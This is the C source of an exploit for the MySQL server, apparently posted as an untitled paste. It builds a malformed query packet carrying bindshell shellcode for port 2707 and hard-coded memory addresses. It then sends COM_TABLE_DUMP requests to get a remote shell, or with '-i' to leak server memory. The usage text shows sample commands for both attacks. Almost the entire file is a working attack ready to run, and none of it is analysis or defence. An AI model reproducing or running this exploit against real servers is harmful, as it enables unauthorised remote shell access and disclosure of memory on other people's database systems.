Untitled

#include <stdio.h>
#include <mysql.h>
#include <unistd.h>


// we need to know the thread struct address pointer and the table_list.
// these are defaults, change them from command line.
int thd = 0x8b1b338;
int tbl = 0x8b3a880;

#define USOCK2 "/tmp/mysql.sock"

char addr_tdh[4];
char addr_tbl[4];
char addr_ret[4];

// constants to overwrite packet with addresses for table_list thread and our shell.
#define TBL_POS  182
#define THD_POS  178
#define RET_POS  174
#define SHL_POS  34

// bindshell spawns a shell with on port 2707
char shcode[] = {
  0x6a, 0x66, 0x58, 0x6a, 0x01, 0x5b, 0x99, 0x52, 0x53, 0x6a, 0x02, 0x89	// 12
 ,0xe1, 0xcd, 0x80, 0x52, 0x43, 0x68, 0xff, 0x02, 0x0a, 0x93, 0x89, 0xe1
 ,0x6a, 0x10, 0x51, 0x50, 0x89, 0xe1, 0x89, 0xc6, 0xb0, 0x66, 0xcd, 0x80
 ,0x43, 0x43, 0xb0, 0x66, 0xcd, 0x80, 0x52, 0x56, 0x89, 0xe1, 0x43, 0xb0
 ,0x66, 0xcd, 0x80, 0x89, 0xd9, 0x89, 0xc3, 0xb0, 0x3f, 0x49, 0xcd, 0x80
 ,0x41, 0xe2, 0xf8, 0x52, 0x68, 0x6e, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x2f
 ,0x62, 0x69, 0x89, 0xe3, 0x52, 0x53, 0x89, 0xe1, 0xb0, 0x0b, 0xcd, 0x80	// 12*7= 84
};

int tmp_idx = 0;

int dump_packet_len = 7;
char table_dump_packet[] = { 0x03, 0x00, 0x00, 0x00, 0x13, 0x02, 0x73 };

int payload_len = 371;
// header packet + select '1234567890...etc'
char query_payload[] = {
      0x6f, 0x01, 0x00, 0x00, 0x03, 0x73, 0x65, 0x6c, 0x65, 0x63, 0x74, 0x20, 0x27, 0x31, 0x32, 0x33	// 16   Some junk from position 6 ...
    , 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x31, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36	// 32
    , 0x37, 0x38, 0x39, 0x30, 0x5f, 0x32, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39	// 48
    , 0x30, 0x5f, 0x33, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x34	// 64
    , 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x35, 0x5f, 0x31, 0x32	// 72
    , 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x36, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35	// 88
    , 0x36, 0x37, 0x38, 0x39, 0x30, 0x5f, 0x37, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38	// 94
    , 0x39, 0x30, 0x5f, 0x38, 0x5f, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x6a	// 112
    , 0x0b, 0x58, 0x99, 0x52, 0x68, 0x6e, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x2f, 0x62, 0x69, 0x89, 0xe3	// 128 endsh 118
    , 0x52, 0x53, 0x89, 0xe1, 0xcd, 0x80, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x4c, 0x4d	// 144
    , 0x4e, 0x4f, 0x50, 0x51, 0x52, 0x53, 0x54, 0x55, 0x56, 0x5a, 0x5f, 0x61, 0x61, 0x62, 0x62, 0x63	// 160
    , 0x63, 0x64, 0x64, 0xa0, 0xe9, 0xff, 0xbf, 0xa0, 0xe9, 0xff, 0xbf, 0xa0, 0xe9, 0x6c, 0xbf, 0x6d	// 176
    , 0x6d, 0x6e, 0x6e, 0xff, 0x6f, 0x70, 0x70, 0x71, 0x71, 0x72, 0x72, 0x73, 0x73, 0x74, 0x74, 0x75	// 192 178
    , 0x75, 0x76, 0x76, 0x7a, 0x7a, 0x5f, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d	// 208
    , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d	// 224
    , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d	// 240
    , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d	// 256
    , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d	// 272
    , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d	// 288
    , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d	//
    , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d	//
    , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d	//
    , 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d, 0x3d	//
    , 0x3d, 0x3d, 0x27
};				// 16*23+3 = 371


static int s = 0, c = 0;
int fd = 0;
int d = 1;
int hexdump = 0;
char buf[65535];


MYSQL *conn;			/* pointer to connection handler */


int
sendit (char *buf1, int fdest, int dblen)
{
  int len1;
  int i = 0;
  int ret = 0;
  printf ("%d\n", d);
  if (d == 2)
    {
      // let's prepare the query packet
      int o;
      int position = 14;

      tmp_idx = 3;


      int ret = tbl - 0x106 + 33;

      for (i = 0; i < 32; i += 8)
	addr_ret[tmp_idx--] = (ret >> i) & 0xff;

      tmp_idx = 3;
      for (i = 0; i < 32; i += 8)
	addr_tdh[tmp_idx--] = (thd >> i) & 0xff;

      tmp_idx = 3;
      for (i = 0; i < 32; i += 8)
	addr_tbl[tmp_idx--] = (tbl >> i) & 0xff;
      printf ("ret %x\n", ret);


#if 1
      tmp_idx = 0;
      for (o = THD_POS; o > THD_POS - 4; o--)
	query_payload[o] = addr_tdh[tmp_idx++];

      tmp_idx = 0;
      for (o = TBL_POS; o > TBL_POS - 4; o--)
	query_payload[o] = addr_tbl[tmp_idx++];

      tmp_idx = 0;
      for (o = RET_POS; o > RET_POS - 4; o--)
	query_payload[o] = addr_ret[tmp_idx++];
#else
      for (; position < payload_len - 12; position += 12)
	{
	  tmp_idx = 0;
	  printf ("p:%d\n", position);
	  for (o = position + 4; o > position; o--)
	    query_payload[o] = addr_ret[tmp_idx++];

	  tmp_idx = 0;
	  for (o = position + 8; o > position + 4; o--)
	    query_payload[o] = addr_tdh[tmp_idx++];

	  tmp_idx = 0;
	  for (o = position + 12; o > position + 8; o--)
	    query_payload[o] = addr_tbl[tmp_idx++];

	}

#endif

      tmp_idx = 0;
      for (o = SHL_POS; o < SHL_POS + 84; o++)
	query_payload[o] = shcode[tmp_idx++];

      printf ("entro\n");
      buf1 = query_payload;
      len1 = payload_len;
    }
  else if (d >= 3)
    {
      printf ("entro\n");

      // prepare table_dump request - PACK_LEN,  0x00,  0x00,  0x00,  COM_TABLE_DUMP (0x13),  DB_NAME_LEN (2) , RANDOM_CHAR (=0x73)
      buf1 = table_dump_packet;
      if (dblen >= 0)
	buf1[5] = (char) dblen;
      printf ("%x", (char) dblen);
      len1 = dump_packet_len;
    }
  d++;

  printf ("\nClient -> Server\n");
  if (hexdump)
    {
      for (i = 0; i < len1; i++)
	printf (" %.2x%c", (unsigned char) buf1[i],
		((i + 1) % 16 ? ' ' : '\n'));
      printf ("\n");
      for (i = 0; i < len1; i++)
	{
	  unsigned char f = (unsigned char) buf1[i];
	  printf (" %.2c%2c", (isprint (f) ? f : '.'),
		  (((i + 1) % 16) ? ' ' : '\n'));
	}
    }
  if (send (fd, buf1, len1, 0) != len1)
    {
      perror ("cli: send(buf3)");
      exit (1);
    }


  fdest = fd;

  memset (buf, 0, 65535);
  ret = recv (fdest, buf, 65535, 0);
  printf ("\nServer -> Client\n");
  if (hexdump)
    {
      for (i = 0; i < ret; i++)
	printf (" %.2x%c", (unsigned char) buf[i],
		((i + 1) % 16 ? ' ' : '\n'));
      printf ("\n");
      for (i = 0; i < ret; i++)
	{
	  unsigned char f = (unsigned char) buf[i];
	  printf (" %.2c%2c", (isprint (f) ? f : '.'),
		  ((i + 1) % 16 ? ' ' : '\n'));
	}
    }
  else
    {
      printf ("\n%s\n", buf + 5);
    }
// printf("\nSending to client\n");
// ret= send(c, buf,  ret, 0);

  return 0;
}

usage ()
{
  printf
    ("\nusage my_exploit [-H] [-i] [-t 0xtable-address] [-a 0xthread-address] [[-s socket]|[-h host][-p port]][-x]\n\n\
-H: this Help;\n\
-i: Information leak exploit (shows the content of MySql Server Memory)\n\
-x: shows c/s communication output in hexadecimal\n\
-t: hexadecimal table_list struct address (by default we try to find it automatically)\n\
-a: hexadecimal thread struct address (look at the error log to see something like: thd=0x8b1b338)\n\
-u: mysql username (anonymous too ;)\n\
-p: mysql userpass (if you need it)\n\
-s: the socket path if is a unix socket\n\
-h: hostname or IP address\n\
-P: port (default 3306)\n\n\nExample_1 - Memoryleak: my_exploit -h 127.0.0.1 -u username -i\n\n\
Example_2 - Remote Shell on port 2707: my_exploit -h 127.0.0.1 -u username -a 0x8b1b338 -t 0x8b3a880\n\n\
 ");

}

int
main (int argc, char *argv[])
{

  int fdest = 0;
  int port = 3306;
  int shell = 1;
  int force_table = 0;
  char buf1[65535];
  char *socket;
  char *user = NULL;
  char *pass = NULL;
  char *host = NULL;
  socket = strdup ("/tmp/mysql2.sock");
  opterr = 0;

  while ((c = getopt (argc, argv, "s:t:a:P:Hh:u:p:ix")) != -1)
    switch (c)
      {
      case 's':
	socket = (char *) optarg;
	break;
      case 't':
	force_table = 1;
	tbl = (int) strtol (optarg, NULL, 16);
	//tbl=atoi(  optarg );
	break;
      case 'a':
	thd = (int) strtol (optarg, NULL, 16);
	break;
      case 'u':
	user = (char *) optarg;
	break;
      case 'p':
	pass = (char *) optarg;
	break;
      case 'P':
	port = atoi (optarg);
	break;
      case 'h':
	host = (char *) optarg;
	break;
      case 'i':
	shell = 0;
	break;
      case 'x':
	hexdump = 1;
	break;
      case 'H':
	usage ();
	return 1;
      default:
	break;
      }

  if (!force_table)
    tbl = thd + 0x1f548;
  conn = mysql_init (NULL);
  int ret = mysql_real_connect (conn,	/* pointer to connection handler */
				host,	/* host to connect to */
				user,	/* user name */
				pass,	/* password */
				NULL,	/* database to use */
				0,	/* port (use default) */
				socket,	/* socket (use default) */
				0);	/* flags (none) */

  if (!ret)
    {
      fprintf (stderr, "Can't connect, error : %s\n", mysql_error (conn));
      return 1;
    }
  printf ("using table_list:%x  thread:%x\n", tbl, thd);

  fd = conn->net.fd;

  if (shell)
    {
      d = 2;
      sendit (buf1, fdest, -1);
      d = 3;
      sendit (buf1, fdest, -1);
      d = 3;
      sendit (buf1, fdest, -1);
    }
  else
    {
      int l;
      d = 3;
      for (l = 0; l < 256; l++)
	{
	  sendit (buf1, fdest, l);
	}
    }
  mysql_close (conn);

  exit (0);
}